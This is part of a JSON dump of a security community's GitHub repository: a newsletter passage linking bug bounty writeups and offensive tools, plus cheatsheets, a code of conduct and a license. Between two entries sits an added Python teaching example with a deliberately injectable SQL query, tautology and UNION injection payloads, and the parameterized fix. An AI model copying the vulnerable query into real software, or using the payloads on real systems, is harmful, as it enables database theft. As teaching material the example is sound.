leaked. \n\n \n\n</details> \n\n \n\n<details> \n\n<summary><b> 5. Hiring/Jobs\n\n</b></summary>\n\nThe purpose of this segment is to talk about and share resources related to jobs in this month, interview questions, and free training offered by organizations, communities, and leaders.\n\n \n\n - 1. 
Take a look at [Internship/Job Openings in October 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. ResetHacker has collected [Interview Questions asked by organizations](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n - 3. [Cybersecurity Jobs HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n\n \n\n</details> \n\n</details> \n\n<span id=\"title-bb\"></span>\n\n<details> \n\n<summary><b> \n  🐞🐞🐞 BUG BOUNTY 🐞🐞🐞 \n\n    > Everything related to Bug Bounty : reports, writeups and resources👇\n\n </b></summary>   \n\n <details> \n\n <summary><b>1. HackerOne/Bugcrowd reports worth reading for Bug Hunters : 4 Reports </b></summary>\n\n \n\n 1. In this segment, we have filtered out the top **HACKERONE/BUGCROWD REPORTS** for Bug Hunters:\n\n   - 🐞 $13,000 weakness : Authentication Bypass Using an Alternate Path or Channel on Stripe, where the impact was [Mass Accounts Takeover Without any user Interaction at https://app.taxjar.com/](https://hackerone.com/reports/1685970)\n\n   - 🐞 $2,000 weakness : Command Injection - Generic on Hyperledger, where the impact was [POOL_UPGRADE request handler may allow an unauthenticated attacker to remotely execute code on every node in the network.](https://hackerone.com/reports/1705717)\n\n   - 🐞 $1,000 weakness : Server-Side Request Forgery (SSRF) on Acronis, where the impact was [mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040](https://hackerone.com/reports/1719719)\n\n   - 🐞 $1,000 weakness : SQL Injection on U.S. Dept Of Defense, where the impact was [Unauthenticated SQL Injection at █████████ [HtUS]](https://hackerone.com/reports/1719719)\n\n   </details> \n\n \n\n<details> \n\n<summary><b>2. BUG BOUNTY : writeups, tips & resources. </b></summary>\n\n \n\n 2. 
In This Beginners friendly segment, We collect and filter out *BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n\n \n\n  - Writeups : 11  :\n\n      - A journey of [fuzzing Nvidia graphic driver leading to LPE exploitation](https://github.com/quarkslab/conf-presentations/blob/master/Hexacon-2022/hexacon_2022_a_journey_of_fuzzing_nvidia_graphic_driver.pdf)\n\n      - Regulator: [A unique method of subdomain enumeration](https://cramppet.github.io/regulator/index.html)\n\n      - Subdomain Enumeration [Tool Face-off 2022](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)\n\n      - SSRF - [Case study of 124 bug bounty reports](https://t.me/resethacker/932) By Grzegorz Niedziela founder of Bug Bounty Reports Explained.\n\n      - 23000$ for [Authentication Bypass & File Upload & Arbitrary File Overwrite](https://medium.com/@h4x0r_dz/23000-for-authentication-bypass-file-upload-arbitrary-file-overwrite-2578b730a5f8)\n\n      - Google [SSO misconfiguration leading to Account Takeover](https://medium.com/@0x4kd/google-sso-misconfiguration-leading-to-account-takeover-cf9bcf63e76e)\n\n      - Facebook [SMS Captcha Was Vulnerable to CSRF Attack](https://lokeshdlk77.medium.com/facebook-sms-captcha-was-vulnerable-to-csrf-attack-8db537b1e980)\n\n      - [Appsmith Patches Full-Read SSRF Vulnerabilities Reported by CloudSEK](https://cloudsek.com/appsmith-patches-full-read-ssrf-vulnerabilities-reported-by-cloudsek/)\n\n      - [Error based SQL Injection with WAF bypass manual Exploit 100%](https://c0nqr0r.medium.com/error-based-sql-injection-with-waf-bypass-manual-exploit-100-bab36b769005)\n\n      - [Story about Escalation of HTML Injection to EC2 Instance credentials leak](https://medium.com/@Cybervenom/story-about-escalation-of-html-injection-to-ec2-instance-credentials-leak-e2cbd7343a83)\n\n      - Firing 8 [Account Takeover Methods](https://0xmaruf.medium.com/firing-8-account-takeover-methods-77e892099050)\n\n   \n\n - Recently Discovered Resources Found 
+ Non-Technical : 4\n\n    - [OSCP Exam Change | Offensive Security](https://www.offensive-security.com/offsec/oscp-exam-structure/)\n\n    - [Cyber Security Career Pathways](https://blog.marcolancini.it/2022/blog-cyber-security-career-pathways/) \n\n      > Marco Lancini voices his concern over organizations trying to sell their certifications and drafted a mindmap, a first attempt at grouping roles into the macro-functions commonly found in tech companies.\n\n    - [Which part of the security community are you in?](https://www.philvenables.com/post/field-guide-to-the-various-communities-of-security)\n\n      > Field Guide to the Various Communities of Security\n\n    - [How to get a Cyber Security Job at Google](https://pentestingguide.com/how-to-get-google-cyber-security-jobs/)\n\n      > If you want to become a hacker, bug bounty hunter or cyber security analyst and your dream job is at Google, Microsoft or Facebook, then this article is meant to help you.\n\n </details> \n\n \n\n <details> \n\n<summary><b>3. Bug Bounty HELPDESK by ResetHacker Community.</b></summary>\n\n   - [Bug Bounty FAQ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n\n   - [Bug bounty Setup & hacker daily utility](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/Readme.md) \n\n   - [Bug Bounty Resources, recon methodology wordlists, mindmaps, checklists etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n\n \n\n</details> \n\n</details> \n\n   <span id=\"title-tools\"></span>\n\n<details> \n\n<summary><b> \n  🛠️🛠️🛠️ NEW TOOLS FOUND 🛠️🛠️🛠️\n\n    > List of tools that satisfy hacker needs in all domains.👇\n\n </b></summary> \n\nSeveral community members test the tools, and we then filter out the most useful and in-demand ones that are relevant to different hacker purposes.\n\n<details>\n\n<summary><b>1. 
SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools</b></summary>\n\n   \n\n  - Janus : [String obfuscation tool based on the CIA's Marble Framework](https://github.com/echtdefault/Janus)\n\n  - vaf : [A fast, simple, and feature-rich web fuzzer written in Nim](https://github.com/d4rckh/vaf)\n\n    > Features: fast threading, HTTP header fuzzing, proxying, your own features, and more...\n\n  - [Text4Shell scanner for Burp Suite](https://github.com/silentsignal/burp-text4shell)\n\n  - [Ghauri](https://github.com/r0oth3x49/ghauri)\n\n    > An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws.\n\n  - [XSLeaker](https://github.com/Philesiv/XSLeaker)\n\n    > XSLeaker is a tool that helps to find XS-Leaks (https://xsleaks.dev/) on websites. The tool compares resource values for which a leak technique is known (e.g. number of iframes) between different stat\n\n \n\n </details>\n\n \n\n<details>\n\n<summary><b>2. Cloud Security - 3 Tools </b></summary>\n\n \n\n  - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n\n  - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n\n  - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting assets from cloud providers. \n\n     > This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds. This is accomplished with very simple configuration efforts.\n\n </details> \n\n<details>\n\n<summary><b>3. Blue/Red/Purple Team, IR and Threat intelligence - 4 Tools </b></summary>\n\n  - [WMEye](https://github.com/pwn1sher/WMEye)\n\n       > A post-exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement. 
\n\n  - [Headless Strike](https://github.com/CodeXTF2/cobaltstrike-headless)\n\n     > It is an Aggressor script that turns the headless aggressor client into a (mostly) functional Cobalt Strike client. \n\n  - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) \n\n     > varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n\n  - [exploits-predict](https://github.com/wisoffe/exploits-predict) \n\n     > Predicts the probability of an exploit being released after a CVE is published (using a machine learning algorithm); the project is based on the [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n\n</details> \n\n<details>\n\n<summary><b>4. Reverse Engineering, Encryption & OSINT - 7 Tools </b></summary> \n\n  - Jetstack Paranoia: [A New Open Source Tool for Container Image Security](https://www.jetstack.io/blog/announcing-paranoia/)\n\n  - Hashview: [A web front-end for password cracking and analytics.](https://github.com/hashview/hashview)\n\n  - [NoRunPI: Run Your Payload Without Running Your Payload](https://github.com/ORCx41/NoRunPI)\n\n  - [SteaLinG v0.3](https://github.com/De3vil/SteaLinG)\n\n     > SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.\n\n  - A simple, (almost) POSIX [shell script for mail security checks](https://github.com/jeffbencteux/mailsecchk)\n\n  - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. \n\n     > Its objective is to deliver a fast and flexible “first view” for malware analysts, stable and capable of handling malformed PE files.\n\n  - OSINT-Bookmarklets: [Fast Search including Dark Web Search. 
](https://github.com/C3n7ral051nt4g3ncy/OSINT-Bookmarklets)                \n\n </details> \n\n<details>\n\n<summary><b>5. IoT, OS & Hardware - 4 Tools</b></summary>   \n\n      \n\n   - [Open Athena](https://github.com/mkrupczak3/OpenAthena) \n\n      > A project that allows consumer and professional drones to pinpoint precise locations from their images. This is accomplished by combining their [sensor metadata](https://github.com/mkrupczak3/OpenAthena/blob/main/drone_sensor_data_blurb.md) with an [offline-ready Digital Elevation Model](https://github.com/mkrupczak3/OpenAthena/blob/main/EIO_fetch_geotiff_example.md) to provide the instant location of what is being observed.\n\n   - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and more Android/iOS hacking.\n\n   - [Cotopaxi](https://github.com/Samsung/cotopaxi) \n\n      > Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n\n   - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) \n\n      > Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n </details> \n\n</details> \n\n---\n\n\n<details>\n\n<summary> 🤝🤝🤝 Team/Contributor and Community Engagement partners and resources that help draft the Weekly Infosec Update.🤝🤝🤝 </summary>\n\n> Huge thanks to our awesome [Community Leader for contributing and giving back to the community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md), and thank you for being part of the team.\n\n   - Contributors : Good Resources Share, Paul Miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [organizations, groups, and communities that support us with engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). 
Without their support, distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [Organizations and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us draft the [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate./md).\n\n </details>\n\n \n ---\n\n#### Wrapping Up\n\n <div align=\"\"><br>\n\n <a href=\"mailto:resethackerofficail@gmail.com?subject=RESETHACKER Community:\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n\n</div>\n\nHave questions, suggestions, feedback or want to contribute? Just reply directly by mail (resethackeroffical@gmail.com); I would love to hear from you.\n\nIf you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them. Thanks for reading!\n\n \n\n<p align=\"\"><img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p> \n\n"
  },
  {
    "path": "ResetCybersecuirty/code-of-conduct.md",
    "content": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nIn the interest of fostering an open and welcoming environment, we as\ncontributors and maintainers pledge to making participation in our project and\nour community a harassment-free experience for everyone, regardless of age, body\nsize, disability, ethnicity, gender identity and expression, level of experience,\nnationality, personal appearance, race, religion, or sexual identity and\norientation.\n\n## Our Standards\n\nExamples of behavior that contributes to creating a positive environment\ninclude:\n\n* Using welcoming and inclusive language\n* Being respectful of differing viewpoints and experiences\n* Gracefully accepting constructive criticism\n* Focusing on what is best for the community\n* Showing empathy towards other community members\n\nExamples of unacceptable behavior by participants include:\n\n* The use of sexualized language or imagery and unwelcome sexual attention or\nadvances\n* Trolling, insulting/derogatory comments, and personal or political attacks\n* Public or private harassment\n* Publishing others' private information, such as a physical or electronic\n  address, without explicit permission\n* Other conduct which could reasonably be considered inappropriate in a\n  professional setting\n\n## Our Responsibilities\n\nProject maintainers are responsible for clarifying the standards of acceptable\nbehavior and are expected to take appropriate and fair corrective action in\nresponse to any instances of unacceptable behavior.\n\nProject maintainers have the right and responsibility to remove, edit, or\nreject comments, commits, code, wiki edits, issues, and other contributions\nthat are not aligned to this Code of Conduct, or to ban temporarily or\npermanently any contributor for other behaviors that they deem inappropriate,\nthreatening, offensive, or harmful.\n\n## Scope\n\nThis Code of Conduct applies both within project spaces and in public spaces\nwhen an 
individual is representing the project or its community. Examples of\nrepresenting a project or community include using an official project e-mail\naddress, posting via an official social media account, or acting as an appointed\nrepresentative at an online or offline event. Representation of a project may be\nfurther defined and clarified by project maintainers.\n\n## Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be\nreported by contacting the project team at resethackerofficial@gmail.com. All\ncomplaints will be reviewed and investigated and will result in a response that\nis deemed necessary and appropriate to the circumstances. The project team is\nobligated to maintain confidentiality with regard to the reporter of an incident.\nFurther details of specific enforcement policies may be posted separately.\n\nProject maintainers who do not follow or enforce the Code of Conduct in good\nfaith may face temporary or permanent repercussions as determined by other\nmembers of the project's leadership.\n\n## Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,\navailable at [https://contributor-covenant.org/version/1/4][version]\n\n[homepage]: https://contributor-covenant.org\n[version]: https://contributor-covenant.org/version/1/4/\n"
  },
  {
    "path": "Sqlinjection.md",
    "content": "**RESETSQLi()**\n\nSQL injection (SQLi) is an injection vulnerability that arises when untrusted input is concatenated into a SQL query, so the database can no longer tell the application's query apart from the attacker's data. By supplying input such as quotes, comment markers or `UNION` clauses, the attacker changes the structure of the query the database actually executes. Depending on the database engine and the privileges of the application's database account, the impact ranges from reading or modifying data in other tables, through authentication bypass, to file access or command execution on the database host. The standard defence is to keep code and data separate with parameterized queries (prepared statements), backed by a least-privilege database account.\n\nIndex | Content\n---|---\n**1** | [SQLi Documentation]()\n**2** | [SQLi Practice labs]()\n**3** | [SQLi Disclosure/Reports/POC]()\n**4** | [SQLi Mindmap]()\n**5** | [SQLi Tools]()\n**6** | [SQLi Ebooks]()\n**7** | [SQLi Researchers]()\n**8** | [SQLi CVE]()\n"
  },
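The SQLi definition in `Sqlinjection.md` above, shown as working code. This is an added example, not code from the RESETHACKER repository: an in-memory SQLite table with constructed rows, a lookup that splices the username into the query text, and the same lookup with a bound parameter. The table name `users`, its columns, the sample rows and the two payload strings are assumptions made for the demonstration.

```python
"""Added example, not part of the RESETHACKER page: the same user lookup built
two ways against an in-memory SQLite database.

vulnerable_lookup() concatenates the username into the SQL text, so input that
contains a quote is parsed as SQL and changes the query's structure.
safe_lookup() sends the same input as a bound parameter, so the engine only
ever compares it as a string. The users table, its columns and the sample rows
are constructed for the demonstration.
"""
import sqlite3

# Constructed sample data; these names are assumptions, not from the page.
SAMPLE_USERS = [("alice", "admin"), ("bob", "user"), ("carol", "user")]

# Classic tautology: turns "WHERE username = ''" into an always-true condition.
TAUTOLOGY_PAYLOAD = "' OR '1'='1"
# UNION-based extraction: appends rows from the schema catalogue (sqlite_master)
# and comments out the application's trailing quote.
UNION_PAYLOAD = "' UNION SELECT name, sql FROM sqlite_master --"


def make_db() -> sqlite3.Connection:
    """Create the in-memory database and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)"
    )
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> list:
    """Deliberately vulnerable: the input is spliced into the query text."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the input is bound as a parameter and never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo() -> dict:
    """Run both lookups with a normal username and with the two payloads."""
    conn = make_db()
    results = {}
    for label, value in [
        ("normal", "bob"),
        ("tautology", TAUTOLOGY_PAYLOAD),
        ("union", UNION_PAYLOAD),
    ]:
        results[f"{label}_vulnerable"] = vulnerable_lookup(conn, value)
        results[f"{label}_safe"] = safe_lookup(conn, value)
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

Running the file prints both lookups for each input: with `bob` they agree, but for the tautology payload the vulnerable lookup returns every row and for the UNION payload it returns the `CREATE TABLE` text of `users` out of `sqlite_master`, while the parameterized lookup returns nothing for either payload because the whole string is compared as a literal username. The same pattern applies to any driver that supports placeholders (`?`, `%s` or `:name`); the point is that the query text is fixed before the input is ever seen.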
  {
    "path": "cheetsheets/BurpSuiteCheetsheet.md",
    "content": "## Hunting for Vulnerabilities with Burp Suite CheatSheet v1.0\n\n- **Chris Dale** @chrisadale: Users can contribute extensions to aid in the discovery of vulnerabilities. Be aware of false positives and use your pentesting skills to ensure you fully explore the findings.\n\n- Param Miner\n> Fast discovery of unlinked (hidden) parameters by guessing names and diffing responses. Check for unlinked GET parameters and headers, and unlinked POST parameters when applicable.\n\n- Backslash Powered Scanner\n> Alerts on interesting transformations of input data and other anomalies. It often produces false positives, but it lets the penetration tester focus on potential vulnerabilities.\n\n- Software Vulnerability Scanner\n> Checks detected software version numbers against the vulners.com vulnerability database.\n\n- HTTP Request Smuggler\n> An extension for Burp Suite designed to help you detect and launch HTTP request smuggling attacks.\n\n- ActiveScan++\n> Extends Burp's active scanner with additional checks: suspicious input transformations, XML input handling, host header attacks and more.\n\n- Retire.js\n> Finds outdated JavaScript libraries and links to the relevant CVEs for your investigation.\n"
  },
  {
    "path": "cheetsheets/Nano.md",
    "content": "# File handling\n\n- Ctrl+S  Save current file\n- Ctrl+O  Offer to write file (\"Save as\")\n- Ctrl+R  Insert a file into current one\n- Ctrl+X  Close buffer, exit from nano\n\n# Editing\n\n- Ctrl+K  Cut current line into cutbuffer\n- Alt+6  Copy current line into cutbuffer\n- Ctrl+U  Paste contents of cutbuffer\n- Alt+T  Cut until end of buffer\n- Ctrl+]  Complete current word\n- Alt+3  Comment/uncomment line/region\n- Alt+U  Undo last action\n- Alt+E  Redo last undone action\n\n# Search and replace\n\n- Ctrl+Q  Start backward search\n- Ctrl+W  Start forward search\n- Alt+Q  Find next occurrence backward\n- Alt+W  Find next occurrence forward\n- Alt+R  Start a replacing session\n\n# Deletion\n\n- Ctrl+H  Delete character before cursor\n- Ctrl+D  Delete character under cursor\n- Alt+Bsp  Delete word to the left\n- Ctrl+Del  Delete word to the right\n- Alt+Del  Delete current line\n\n# Operations\n\n- Ctrl+T  Execute some command\n- Ctrl+J  Justify paragraph or region\n- Alt+J  Justify entire buffer\n- Alt+B  Run a syntax check\n- Alt+F  Run a formatter/fixer/arranger\n- Alt+:  Start/stop recording of macro\n- Alt+;  Replay macro\n\n# Moving around\n\n- Ctrl+B  One character backward\n- Ctrl+F  One character forward\n- Ctrl+←  One word backward\n- Ctrl+→  One word forward\n- Ctrl+A  To start of line\n- Ctrl+E  To end of line\n- Ctrl+P  One line up\n- Ctrl+N  One line down\n- Ctrl+↑  To previous block\n- Ctrl+↓  To next block\n- Ctrl+Y  One page up\n- Ctrl+V  One page down\n- Alt+\\  To top of buffer\n- Alt+/  To end of buffer\n\n# Special movement\n\n- Alt+G  Go to specified line\n- Alt+]  Go to complementary bracket\n- Alt+↑  Scroll viewport up\n- Alt+↓  Scroll viewport down\n- Alt+<  Switch to preceding buffer\n- Alt+>  Switch to succeeding buffer\n\n# Information\n\n- Ctrl+C  Report cursor position\n- Alt+D  Report line/word/character count\n- Ctrl+G  Display help text\n\n# Various\n\n- Alt+A  Turn the mark on/off\n- Tab  Indent marked region\n- Shift+Tab  Unindent marked region\n- Alt+V  Enter next keystroke verbatim\n- Alt+N  Turn line numbers on/off\n- Alt+P  Turn visible whitespace on/off\n- Alt+X  Hide or unhide the help lines\n- Ctrl+L  Refresh the screen\n"
  },
  {
    "path": "cheetsheets/Readme.md",
    "content": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\nChris Dale | [BurpSuite Cheatsheet v1.0](/cheetsheets/BurpSuiteCheetsheet.md)\nBlogs | [NMAP cheatsheets](/cheetsheets/nmapcheetsheet.md)\nBlog/ebook | [Metasploit cheatsheets](/cheetsheets/metasploitcheetsheet.md)\nBug Bounty/Checklist | [Bug Bounty checklist](https://d.docs.live.net/7f17912d09b5e077/Documents/PEntesting.xlsx)\n\n# Pentesting Mindmap\n\nAuthor | Title\n-- | --\n**1** FroGyY | [Detailed Web-App-Pentesting Mindmap](https://github.com/iamthefrogy/Web-Application-Pentest-Checklist)\n"
  },
  {
    "path": "cheetsheets/metasploitcheetsheet.md",
    "content": "# Cheatsheet for Metasploit\n\nCheatsheet | Metasploit\n-- | --\nCheat Sheet | [Metasploit Cheat Sheet v1.](https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html)\nCheat Sheet | [Metasploit Cheat Sheet v2.](https://www.amazon.com/Nmap-exploration-security-auditing-Cookbook/dp/1849517487)\n"
  },
  {
    "path": "cheetsheets/nmapcheetsheet.md",
    "content": "Credit goes to the respective authors and Team RESETHACKER.\n\n# Cheatsheet for NMAP\n\nCheatsheet | NMAP\n-- | --\nCheat Sheet | [NMAP Cheatsheet v1.](https://redteamtutorials.com/2018/10/14/nmap-cheatsheet/)\nCheat Sheet | [NMAP Cheatsheet v2.](https://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/)\nCheat Sheet | [NMAP Cheatsheet v3.](https://www.stationx.net/nmap-cheat-sheet/)\nCheat Sheet | [NMAP Cheatsheet v4.](https://highon.coffee/blog/nmap-cheat-sheet/)\nMohamed M.Aly | [NMAP Mind MAP](https://drive.google.com/file/d/14xVPmJa9z3BdwiUFSDY2ZPbt7Mw242b4/view?usp=drivesdk)\n"
  },
  {
    "path": "enterprises.md",
    "content": "# Enterprises\n\n- Who conducts VAPT?\n> Updating Soon\n\n- Benefit of VAPT? by Simran Singh\n> VAPT offers various benefits to the enterprise when it comes to system security, such as:\n\n> a. It will give you a comprehensive evaluation of your application.\n\n> b. It will help you understand loopholes or errors that can lead to major cyber attacks.\n\n> c. VAPT gives a more detailed view of the threats that your network or application is facing.\n\n> d. It helps enterprises protect their data and systems from malicious attacks.\n\n> e. VAPT is important for accomplishing compliance standards.\n\n> f. It protects your business from data loss and unauthorized access.\n\n> g. It will help you protect your data from outside and insider threats.\n\n- Purpose\n>\n- Vulnerability severity & impact analysis\n>\n- Difference between VA & PT?\n>\n"
  },
  {
    "path": "license",
    "content": "CC0 1.0 Universal\n\nStatement of Purpose\n\nThe laws of most jurisdictions throughout the world automatically confer exclusive Copyright and Related Rights (defined below) upon the creator and subsequent owner(s) (each and all, an \"owner\") of an original work of authorship and/or a database (each, a \"Work\").\n\nCertain owners wish to permanently relinquish those rights to a Work for the purpose of contributing to a commons of creative, cultural and scientific works (\"Commons\") that the public can reliably and without fear of later claims of infringement build upon, modify, incorporate in other works, reuse and redistribute as freely as possible in any form whatsoever and for any purposes, including without limitation commercial purposes. These owners may contribute to the Commons to promote the ideal of a free culture and the further production of creative, cultural and scientific works, or to gain reputation or greater distribution for their Work in part through the use and efforts of others.\n\nFor these and/or other purposes and motivations, and without any expectation of additional consideration or compensation, the person associating CC0 with a Work (the \"Affirmer\"), to the extent that he or she is an owner of Copyright and Related Rights in the Work, voluntarily elects to apply CC0 to the Work and publicly distribute the Work under its terms, with knowledge of his or her Copyright and Related Rights in the Work and the meaning and intended legal effect of CC0 on those rights.\n\nCopyright and Related Rights. A Work made available under CC0 may be protected by copyright and related or neighboring rights (\"Copyright and Related Rights\"). Copyright and Related Rights include, but are not limited to, the following:\ni. the right to reproduce, adapt, distribute, perform, display, communicate, and translate a Work;\n\nii. moral rights retained by the original author(s) and/or performer(s);\n\niii. 
publicity and privacy rights pertaining to a person's image or likeness depicted in a Work;\n\niv. rights protecting against unfair competition in regards to a Work, subject to the limitations in paragraph 4(a), below;\n\nv. rights protecting the extraction, dissemination, use and reuse of data in a Work;\n\nvi. database rights (such as those arising under Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, and under any national implementation thereof, including any amended or successor version of such directive); and\n\nvii. other similar, equivalent or corresponding rights throughout the world based on applicable law or treaty, and any national implementations thereof.\n\nWaiver. To the greatest extent permitted by, but not in contravention of, applicable law, Affirmer hereby overtly, fully, permanently, irrevocably and unconditionally waives, abandons, and surrenders all of Affirmer's Copyright and Related Rights and associated claims and causes of action, whether now known or unknown (including existing as well as future claims and causes of action), in the Work (i) in all territories worldwide, (ii) for the maximum duration provided by applicable law or treaty (including future time extensions), (iii) in any current or future medium and for any number of copies, and (iv) for any purpose whatsoever, including without limitation commercial, advertising or promotional purposes (the \"Waiver\"). Affirmer makes the Waiver for the benefit of each member of the public at large and to the detriment of Affirmer's heirs and successors, fully intending that such Waiver shall not be subject to revocation, rescission, cancellation, termination, or any other legal or equitable action to disrupt the quiet enjoyment of the Work by the public as contemplated by Affirmer's express Statement of Purpose.\n\nPublic License Fallback. 
Should any part of the Waiver for any reason be judged legally invalid or ineffective under applicable law, then the Waiver shall be preserved to the maximum extent permitted taking into account Affirmer's express Statement of Purpose. In addition, to the extent the Waiver is so judged Affirmer hereby grants to each affected person a royalty-free, non transferable, non sublicensable, non exclusive, irrevocable and unconditional license to exercise Affirmer's Copyright and Related Rights in the Work (i) in all territories worldwide, (ii) for the maximum duration provided by applicable law or treaty (including future time extensions), (iii) in any current or future medium and for any number of copies, and (iv) for any purpose whatsoever, including without limitation commercial, advertising or promotional purposes (the \"License\"). The License shall be deemed effective as of the date CC0 was applied by Affirmer to the Work. Should any part of the License for any reason be judged legally invalid or ineffective under applicable law, such partial invalidity or ineffectiveness shall not invalidate the remainder of the License, and in such case Affirmer hereby affirms that he or she will not (i) exercise any of his or her remaining Copyright and Related Rights in the Work or (ii) assert any associated claims and causes of action with respect to the Work, in either case contrary to Affirmer's express Statement of Purpose.\n\nLimitations and Disclaimers.\n\na. No trademark or patent rights held by Affirmer are waived, abandoned, surrendered, licensed or otherwise affected by this document.\n\nb. 
Affirmer offers the Work as-is and makes no representations or warranties of any kind concerning the Work, express, implied, statutory or otherwise, including without limitation warranties of title, merchantability, fitness for a particular purpose, non infringement, or the absence of latent or other defects, accuracy, or the present or absence of errors, whether or not discoverable, all to the greatest extent permissible under applicable law.\n\nc. Affirmer disclaims responsibility for clearing rights of other persons that may apply to the Work or any use thereof, including without limitation any person's Copyright and Related Rights in the Work. Further, Affirmer disclaims responsibility for obtaining any necessary consents, permissions or other rights required for any use of the Work.\n\nd. Affirmer understands and acknowledges that Creative Commons is not a party to this document and has no duty or obligation with respect to this CC0 or use of the Work.\n\nFor more information, please see https://creativecommons.org/publicdomain/zero/1.0\n"
  }
]